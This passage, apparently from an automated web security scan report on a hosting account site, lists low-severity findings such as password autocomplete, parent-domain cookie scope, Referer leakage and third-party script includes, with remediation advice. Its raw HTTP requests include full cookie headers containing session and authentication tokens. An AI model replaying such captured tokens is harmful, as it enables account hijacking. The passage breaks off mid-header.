currency459490=potableSourceStr=USD; adc459490=US; SiteWidth459490=1000; currencypopin459490=cdisplaypopin=false; flag459490=cflag=us; currency459469=potableSourceStr=USD; adc459469=US; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; pathway=bcc7c567-0d6c-4670-a664-45bf7f6caffc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; gdMyaHubble459469=ShopperID=dbkbjiucdbrgkjweidzenaffffxctfkh&Hubble=True; ASP.NET_SessionId=iuiim255x3tuwp55dl1pe555; traffic=; MemAuthId459469=ddqbeevdkbjexhzduaqgfbzandeajelcgfdjvjscnhedderbhbdcbbndddfcfdbjbfcitgneqdyjgfjiuendydyabepcfdii; ShopperId459469=ygrcpggimjpdxbygfavdrjahkeeacfaj; MemShopperId459469=potableSourceStr=ygrcpggimjpdxbygfavdrjahkeeacfaj

Response

HTTP/1.1 200 OK
Date: Wed, 27 Oct 2010 21:49:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 238173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link
...[SNIP]...
</div>
<form style="margin: 0;" name="pchFL" id="pchFL" method="POST" action="https://idp.securepaynet.net/login.aspx?ci=9106&amp;prog_id=459469&amp;spkey=SPMYA-M1PWMYAWEB004" onSubmit="return pchj_login_action(this);">
<div class="pch_rite" onMouseOver="pchj_movr('pch_pw','Password');" onMouseOut="pchj_mout('pch_pw');">
...[SNIP]...
</div><input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pch_i_lp inp_iphone"></div>
...[SNIP]...

4.2. https://mya.securepaynet.net/products/accountlist.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /products/accountlist.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /products/accountlist.aspx?ci=13022&product=searchenginevisibility&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Referer: https://mya.securepaynet.net/default.aspx?ci=9106&prog_id=459469
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag459406=cflag=us; SiteWidth459406=1000; currency459423=potableSourceStr=USD; currencypopin459423=cdisplaypopin=false; flag459423=cflag=us; SiteWidth459423=1000; currency459424=potableSourceStr=USD; currencypopin459424=cdisplaypopin=false; flag459424=cflag=us; SiteWidth459424=1000; currency459428=potableSourceStr=USD; currencypopin459428=cdisplaypopin=false; flag459428=cflag=us; SiteWidth459428=1000; currency459429=potableSourceStr=USD; currencypopin459429=cdisplaypopin=false; flag459429=cflag=us; SiteWidth459429=1000; currency459431=potableSourceStr=USD; currencypopin459431=cdisplaypopin=false; flag459431=cflag=us; SiteWidth459431=1000; currency459437=potableSourceStr=USD; currencypopin459437=cdisplaypopin=false; flag459437=cflag=us; currency459448=potableSourceStr=USD; currencypopin459448=cdisplaypopin=false; flag459448=cflag=us; SiteWidth459448=1000; currency459449=potableSourceStr=USD; currencypopin459449=cdisplaypopin=false; flag459449=cflag=us; SiteWidth459449=1000; currency459490=potableSourceStr=USD; adc459490=US; SiteWidth459490=1000; currencypopin459490=cdisplaypopin=false; flag459490=cflag=us; currency459469=potableSourceStr=USD; adc459469=US; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; pathway=bcc7c567-0d6c-4670-a664-45bf7f6caffc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; gdMyaHubble459469=ShopperID=dbkbjiucdbrgkjweidzenaffffxctfkh&Hubble=True; ASP.NET_SessionId=iuiim255x3tuwp55dl1pe555; traffic=; MemAuthId459469=ddqbeevdkbjexhzduaqgfbzandeajelcgfdjvjscnhedderbhbdcbbndddfcfdbjbfcitgneqdyjgfjiuendydyabepcfdii; ShopperId459469=ygrcpggimjpdxbygfavdrjahkeeacfaj; MemShopperId459469=potableSourceStr=ygrcpggimjpdxbygfavdrjahkeeacfaj

Response

HTTP/1.1 200 OK
Date: Wed, 27 Oct 2010 21:50:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 265129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><script
...[SNIP]...
</div>
<form style="margin: 0;" name="pchFL" id="pchFL" method="POST" action="https://idp.securepaynet.net/login.aspx?ci=9106&amp;prog_id=459469&amp;spkey=SPMYA-M1PWMYAWEB004" onSubmit="return pchj_login_action(this);">
<div class="pch_rite" onMouseOver="pchj_movr('pch_pw','Password');" onMouseOut="pchj_mout('pch_pw');">
...[SNIP]...
</div><input tabindex="10" onfocus="document.getElementById('pass_focus').value='true';pcj_blurpass('over');" onblur="document.getElementById('pass_focus').value='false';pcj_blurpass('off');" type="password" name="password" id="password" value="" class="pch_i_lp inp_iphone"></div>
...[SNIP]...

5. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /products/accountlist.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /products/accountlist.aspx?ci=1815&product=hosting&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: currency459469=potableSourceStr=USD; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; gdMyaHubble459469=ShopperID=hjlbxfjdvblibbigmishdjwhrabcpbve&Hubble=True; ShopperId459469=cetbeecepgqgtdhdaisijbddhjjgejti; adc459469=US; pathway=d6c169ee-a7dd-41fe-82d0-f24e6664c78a; pagecount=1; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; traffic=; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1

Response

HTTP/1.1 302 Found
Date: Tue, 26 Oct 2010 05:15:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: https://idp.securepaynet.net/login.aspx?SPKey=SPMYA-M1PWMYAWEB011&redirect=false&myaurl=%2fproducts%2faccountlist.aspx&ci=1815&product=hosting&prog_id=459469
Set-Cookie: ASP.NET_SessionId=b2rojz554y05ix45gunhku55; path=/; HttpOnly
Set-Cookie: ShopperId459469=bcwemdfeljdhzfuhganjodefdblbnjtd; domain=securepaynet.net; expires=Mon, 26-Oct-2020 05:15:29 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 294

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://idp.securepaynet.net/login.aspx?SPKey=SPMYA-M1PWMYAWEB011&amp;redirect=false&amp;myaurl=%2fproducts%2faccount
...[SNIP]...

6. Cross-domain Referer leakage  previous  next
There are 2 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


6.1. https://mya.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /default.aspx?ci=9106&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Referer: http://www.securepaynet.net/Hosting/web-hosting.aspx?prog_id=459469
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag459406=cflag=us; SiteWidth459406=1000; currency459423=potableSourceStr=USD; currencypopin459423=cdisplaypopin=false; flag459423=cflag=us; SiteWidth459423=1000; currency459424=potableSourceStr=USD; currencypopin459424=cdisplaypopin=false; flag459424=cflag=us; SiteWidth459424=1000; currency459428=potableSourceStr=USD; currencypopin459428=cdisplaypopin=false; flag459428=cflag=us; SiteWidth459428=1000; currency459429=potableSourceStr=USD; currencypopin459429=cdisplaypopin=false; flag459429=cflag=us; SiteWidth459429=1000; currency459431=potableSourceStr=USD; currencypopin459431=cdisplaypopin=false; flag459431=cflag=us; SiteWidth459431=1000; currency459437=potableSourceStr=USD; currencypopin459437=cdisplaypopin=false; flag459437=cflag=us; currency459448=potableSourceStr=USD; currencypopin459448=cdisplaypopin=false; flag459448=cflag=us; SiteWidth459448=1000; currency459449=potableSourceStr=USD; currencypopin459449=cdisplaypopin=false; flag459449=cflag=us; SiteWidth459449=1000; currency459490=potableSourceStr=USD; adc459490=US; SiteWidth459490=1000; currencypopin459490=cdisplaypopin=false; flag459490=cflag=us; currency459469=potableSourceStr=USD; adc459469=US; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; pathway=bcc7c567-0d6c-4670-a664-45bf7f6caffc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; gdMyaHubble459469=ShopperID=dbkbjiucdbrgkjweidzenaffffxctfkh&Hubble=True; ASP.NET_SessionId=iuiim255x3tuwp55dl1pe555; traffic=; MemAuthId459469=ddqbeevdkbjexhzduaqgfbzandeajelcgfdjvjscnhedderbhbdcbbndddfcfdbjbfcitgneqdyjgfjiuendydyabepcfdii; ShopperId459469=ygrcpggimjpdxbygfavdrjahkeeacfaj; MemShopperId459469=potableSourceStr=ygrcpggimjpdxbygfavdrjahkeeacfaj

Response

HTTP/1.1 200 OK
Date: Wed, 27 Oct 2010 21:49:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 238173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link rel="Stylesheet" type="text/css" href="https://img1.wsimg.com/mya/css/0/mya_https_20100525.css" /><title>
...[SNIP]...
<body id="body" style="margin: 0 0 0 0; padding: 0 0 0 0;" onunload="javascript:$j('body').html('');">

<script src="https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>


    <script src="https://img1.wsimg.com/mya/scripts/jquery.stylish-select3.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link href='https://img2.wsimg.com/pc_css/pl_20100825_https.css' type="text/css" rel="stylesheet" />

<!--*-ok-*-->
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc_css/pl_20100611.js" xmlns:DataCache="urn:xsltDataCache"></script>
...[SNIP]...
<a id="pch_flaglink" name="pch_flaglink" title="Click on the flag to change your currency" href="javascript:atlIsiShow();"><img id="pch_fl_flag" src="https://img5.wsimg.com/fos/icn/country_flags/us.gif" border="0"></a>
...[SNIP]...
<div class="pch_ct_countalt"><img id="pch_ct_count_tip" src="https://img5.wsimg.com/fos/spc/spc_tran.gif" height="19" width="65"></div>
...[SNIP]...
<div id="ctl00_ProductManagement1_tblRecommendedProductsTitle" class="myasb_basebtn recommendedbtn mya-sidebar-menu">
<img src="https://img1.wsimg.com/mya/0/headers/img_recprod_off.png" id="ctl00_ProductManagement1_imgRecommendedProductsHeader" alt="Recommended Products" style="width:220px;height:23px;" onmouseover="this.src='https://img1.wsimg.com/mya/0/headers/img_recprod_on.png'" onmouseout="this.src='https://img1.wsimg.com/mya/0/headers/img_recprod_off.png'" />
</div>
...[SNIP]...
<a href="javascript:toggleTwitter('close', '');"><img src='https://img1.wsimg.com/mya/0/buttons/close_window_icon.gif'
border='0' alt='close' />
</a>
...[SNIP]...
<td>
<img src='https://img1.wsimg.com/mya/default/icon_available_alert.gif' border='0'
alt='' />

</td>
...[SNIP]...
<td>
<img src='https://img1.wsimg.com/mya/default/icon_not_available_alert.gif'
border='0' alt='' />

</td>
...[SNIP]...
<td>
<img src='https://img1.wsimg.com/mya/default/icon_error_alert.gif' border='0'
alt='' />

</td>
...[SNIP]...
<td>
<img src='https://img1.wsimg.com/mya/twitter_error_image.gif' alt="Twitter" />
</td>
...[SNIP]...
<div id="product-pod-spinner" style="margin: -18px 0 0 -2px; position: absolute; display: none;">
<img src='https://img1.wsimg.com/fos/ani/spinner.gif' alt="Please Wait..." style="margin: 0; padding: 0;" />
</div>
...[SNIP]...
<div id="products-error-container" style="position: absolute;">
<img id="products-progress" src='https://img1.wsimg.com/fos/ani/spinner.gif' alt="Please Wait..."
style="margin: 0; padding: 0; vertical-align: middle; position: absolute; display: none;" />
<span id="products-progress-error"
style="display: none; position: absolute; white-space: nowrap;">
...[SNIP]...
<div id="modal-spinner" style="position:absolute;z-index:10000;display:none;">
<img src='https://img1.wsimg.com/mya/0/dragon/ani/ani_wait_bar.gif' alt="Please Wait..." style="margin: 0; padding: 0;" />
</div>
...[SNIP]...
</div><script type="text/JavaScript" src="https://rt.trafficfacts.com/tf.php?k=2946g2e1e1886f1f818d16e87fbc63d92efed34ea416bh13;c=s;v=2"></script>
...[SNIP]...
<noscript><img src="https://rt.trafficfacts.com/ns.php?k=2946g2e1e1886f1f818d16e87fbc63d92efed34ea416bh13" height="1" width="1" alt=""></noscript>
...[SNIP]...

6.2. https://mya.securepaynet.net/products/accountlist.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /products/accountlist.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/accountlist.aspx?ci=13022&product=searchenginevisibility&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Referer: https://mya.securepaynet.net/default.aspx?ci=9106&prog_id=459469
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag459406=cflag=us; SiteWidth459406=1000; currency459423=potableSourceStr=USD; currencypopin459423=cdisplaypopin=false; flag459423=cflag=us; SiteWidth459423=1000; currency459424=potableSourceStr=USD; currencypopin459424=cdisplaypopin=false; flag459424=cflag=us; SiteWidth459424=1000; currency459428=potableSourceStr=USD; currencypopin459428=cdisplaypopin=false; flag459428=cflag=us; SiteWidth459428=1000; currency459429=potableSourceStr=USD; currencypopin459429=cdisplaypopin=false; flag459429=cflag=us; SiteWidth459429=1000; currency459431=potableSourceStr=USD; currencypopin459431=cdisplaypopin=false; flag459431=cflag=us; SiteWidth459431=1000; currency459437=potableSourceStr=USD; currencypopin459437=cdisplaypopin=false; flag459437=cflag=us; currency459448=potableSourceStr=USD; currencypopin459448=cdisplaypopin=false; flag459448=cflag=us; SiteWidth459448=1000; currency459449=potableSourceStr=USD; currencypopin459449=cdisplaypopin=false; flag459449=cflag=us; SiteWidth459449=1000; currency459490=potableSourceStr=USD; adc459490=US; SiteWidth459490=1000; currencypopin459490=cdisplaypopin=false; flag459490=cflag=us; currency459469=potableSourceStr=USD; adc459469=US; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; pathway=bcc7c567-0d6c-4670-a664-45bf7f6caffc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; gdMyaHubble459469=ShopperID=dbkbjiucdbrgkjweidzenaffffxctfkh&Hubble=True; ASP.NET_SessionId=iuiim255x3tuwp55dl1pe555; traffic=; MemAuthId459469=ddqbeevdkbjexhzduaqgfbzandeajelcgfdjvjscnhedderbhbdcbbndddfcfdbjbfcitgneqdyjgfjiuendydyabepcfdii; ShopperId459469=ygrcpggimjpdxbygfavdrjahkeeacfaj; MemShopperId459469=potableSourceStr=ygrcpggimjpdxbygfavdrjahkeeacfaj

Response

HTTP/1.1 200 OK
Date: Wed, 27 Oct 2010 21:50:32 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 265129


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><script
...[SNIP]...
<!-- start MyAccount Header-->

<link href='https://img2.wsimg.com/pc_css/pl_20100825_https.css' type="text/css" rel="stylesheet" />

<!--*-ok-*-->
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc_css/pl_20100611.js" xmlns:DataCache="urn:xsltDataCache"></script>
...[SNIP]...
<a id="pch_flaglink" name="pch_flaglink" title="Click on the flag to change your currency" href="javascript:atlIsiShow();"><img id="pch_fl_flag" src="https://img5.wsimg.com/fos/icn/country_flags/us.gif" border="0"></a>
...[SNIP]...
<div class="pch_ct_countalt"><img id="pch_ct_count_tip" src="https://img5.wsimg.com/fos/spc/spc_tran.gif" height="19" width="65"></div>
...[SNIP]...
</div><script type="text/JavaScript" src="https://rt.trafficfacts.com/tf.php?k=2946g2e1e1886f1f818d16e87fbc63d92efed34ea416bh13;c=s;v=2"></script>
...[SNIP]...
<noscript><img src="https://rt.trafficfacts.com/ns.php?k=2946g2e1e1886f1f818d16e87fbc63d92efed34ea416bh13" height="1" width="1" alt=""></noscript>
...[SNIP]...

7. Cross-domain script include  previous  next
There are 2 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


7.1. https://mya.securepaynet.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx?ci=9106&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Referer: http://www.securepaynet.net/Hosting/web-hosting.aspx?prog_id=459469
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag459406=cflag=us; SiteWidth459406=1000; currency459423=potableSourceStr=USD; currencypopin459423=cdisplaypopin=false; flag459423=cflag=us; SiteWidth459423=1000; currency459424=potableSourceStr=USD; currencypopin459424=cdisplaypopin=false; flag459424=cflag=us; SiteWidth459424=1000; currency459428=potableSourceStr=USD; currencypopin459428=cdisplaypopin=false; flag459428=cflag=us; SiteWidth459428=1000; currency459429=potableSourceStr=USD; currencypopin459429=cdisplaypopin=false; flag459429=cflag=us; SiteWidth459429=1000; currency459431=potableSourceStr=USD; currencypopin459431=cdisplaypopin=false; flag459431=cflag=us; SiteWidth459431=1000; currency459437=potableSourceStr=USD; currencypopin459437=cdisplaypopin=false; flag459437=cflag=us; currency459448=potableSourceStr=USD; currencypopin459448=cdisplaypopin=false; flag459448=cflag=us; SiteWidth459448=1000; currency459449=potableSourceStr=USD; currencypopin459449=cdisplaypopin=false; flag459449=cflag=us; SiteWidth459449=1000; currency459490=potableSourceStr=USD; adc459490=US; SiteWidth459490=1000; currencypopin459490=cdisplaypopin=false; flag459490=cflag=us; currency459469=potableSourceStr=USD; adc459469=US; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; pathway=bcc7c567-0d6c-4670-a664-45bf7f6caffc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; gdMyaHubble459469=ShopperID=dbkbjiucdbrgkjweidzenaffffxctfkh&Hubble=True; ASP.NET_SessionId=iuiim255x3tuwp55dl1pe555; traffic=; MemAuthId459469=ddqbeevdkbjexhzduaqgfbzandeajelcgfdjvjscnhedderbhbdcbbndddfcfdbjbfcitgneqdyjgfjiuendydyabepcfdii; ShopperId459469=ygrcpggimjpdxbygfavdrjahkeeacfaj; MemShopperId459469=potableSourceStr=ygrcpggimjpdxbygfavdrjahkeeacfaj

Response

HTTP/1.1 200 OK
Date: Wed, 27 Oct 2010 21:49:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 238173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><link
...[SNIP]...
<body id="body" style="margin: 0 0 0 0; padding: 0 0 0 0;" onunload="javascript:$j('body').html('');">

<script src="https://img1.wsimg.com/AtlantisScripts/jquery/jquery-1.3.2.min.js" type="text/javascript"></script>


    <script src="https://img1.wsimg.com/mya/scripts/jquery.stylish-select3.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script type="text/javascript" language="javascript" src="https://img3.wsimg.com/pc_css/pl_20100611.js" xmlns:DataCache="urn:xsltDataCache"></script>
...[SNIP]...
</div><script type="text/JavaScript" src="https://rt.trafficfacts.com/tf.php?k=2946g2e1e1886f1f818d16e87fbc63d92efed34ea416bh13;c=s;v=2"></script>
...[SNIP]...

7.2. https://mya.securepaynet.net/products/accountlist.aspx  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mya.securepaynet.net
Path:   /products/accountlist.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/accountlist.aspx?ci=13022&product=searchenginevisibility&prog_id=459469 HTTP/1.1
Host: mya.securepaynet.net
Connection: keep-alive
Referer: https://mya.securepaynet.net/default.aspx?ci=9106&prog_id=459469
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: flag459406=cflag=us; SiteWidth459406=1000; currency459423=potableSourceStr=USD; currencypopin459423=cdisplaypopin=false; flag459423=cflag=us; SiteWidth459423=1000; currency459424=potableSourceStr=USD; currencypopin459424=cdisplaypopin=false; flag459424=cflag=us; SiteWidth459424=1000; currency459428=potableSourceStr=USD; currencypopin459428=cdisplaypopin=false; flag459428=cflag=us; SiteWidth459428=1000; currency459429=potableSourceStr=USD; currencypopin459429=cdisplaypopin=false; flag459429=cflag=us; SiteWidth459429=1000; currency459431=potableSourceStr=USD; currencypopin459431=cdisplaypopin=false; flag459431=cflag=us; SiteWidth459431=1000; currency459437=potableSourceStr=USD; currencypopin459437=cdisplaypopin=false; flag459437=cflag=us; currency459448=potableSourceStr=USD; currencypopin459448=cdisplaypopin=false; flag459448=cflag=us; SiteWidth459448=1000; currency459449=potableSourceStr=USD; currencypopin459449=cdisplaypopin=false; flag459449=cflag=us; SiteWidth459449=1000; currency459490=potableSourceStr=USD; adc459490=US; SiteWidth459490=1000; currencypopin459490=cdisplaypopin=false; flag459490=cflag=us; currency459469=potableSourceStr=USD; adc459469=US; currencypopin459469=cdisplaypopin=false; flag459469=cflag=us; SiteWidth459469=1000; pathway=bcc7c567-0d6c-4670-a664-45bf7f6caffc; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=cdefc0c5-5ae8-4fe4-984f-922f577fb093; gdMyaHubble459469=ShopperID=dbkbjiucdbrgkjweidzenaffffxctfkh&Hubble=True; ASP.NET_SessionId=iuiim255x3tuwp55dl1pe555; traffic=; 